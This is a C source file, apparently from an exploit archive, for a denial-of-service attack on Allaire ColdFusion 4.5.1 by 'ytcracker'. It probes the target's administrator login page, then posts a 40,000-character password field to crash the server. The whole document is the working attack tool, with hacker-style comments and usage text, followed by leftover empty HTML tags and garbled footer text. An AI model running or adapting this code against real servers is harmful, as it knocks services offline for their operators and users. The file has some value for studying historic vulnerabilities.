/* [yl-cfDoS.c] title: [cold fusion 4.5.1 ereeu DoS attack] date: 06.11.2000 author: ytcracker[phed@felons.org] comments: allaire[www.allaire.com]'s cold fusion webserver seemingly has an odd little bug in it where it suffers from a denial of service attack when the administrator panel is accessed using a character post of greater than 4o,ooo characters. if your password is 4o,ooo or more characters, i suggest that you change your password immediately. usage: ./yl-cfDoS [website to hax0r] shouts: seven one nine. master p and the no limit army. geese. credit: foundstone for the buqtraq advisory. */ #include #include #include #include #include #include #include #include #include #include #include #include int main(int argc, char **argv) { int sock; unsigned long vulnip; struct in_addr addr; struct sockaddr_in sin; struct hostent *he; char *detect; char buffer[1024]; char cfhack[]="POST /cfide/administrator/index.cfm HTTP/1.0\n\nReferer: http://www.csanetworks.com\nUser-Agent: ytCracker vo.1 (ytCLinux 5.o)\n"; char cfchars[40001]; char cfdos[40050]; printf("\n [cf 4.5.1 DoS] [ytcracker] [phed@felons.org]\n"); if(argc<2) { printf(" usage: %s [vulnerable website]\n\n",argv[0]); exit(0); } if ((he=gethostbyname(argv[1])) == NULL) { herror("gethostbyname"); exit(0); } vulnip=inet_addr(argv[1]); vulnip=ntohl(vulnip); sock=socket(AF_INET, SOCK_STREAM, 0); bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(80); if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) { perror("connect"); } send(sock, cfhack,strlen(cfhack),0); recv(sock, buffer, sizeof(buffer),0); detect = strstr(buffer,"404"); close(sock); if( detect != NULL) { printf(" vulnerabilty not detected.\n\n"); exit(0); } else printf(" vulnerability detected.\n"); printf(" sending crash data.\n"); memset(cfchars,89,sizeof(cfchars)); sprintf(cfdos,"%s\nPasswordProvided=%s\n\n\n",cfhack,cfchars); vulnip=inet_addr(argv[1]); vulnip=ntohl(vulnip); sock=socket(AF_INET, SOCK_STREAM, 0); bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(80); if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) { perror("connect"); } send(sock,cfdos,strlen(cfdos),0); close(sock); printf(" data sent!\n\n"); return 0; }
<span id="7ztzv"></span>
<sub id="7ztzv"></sub>


<span id="7ztzv"></span><form id="7ztzv"></form>


<span id="7ztzv"></span>
    

      

        <address id="7ztzv"></address>
            

ÑÇÖÞÅ·ÃÀÔÚÏß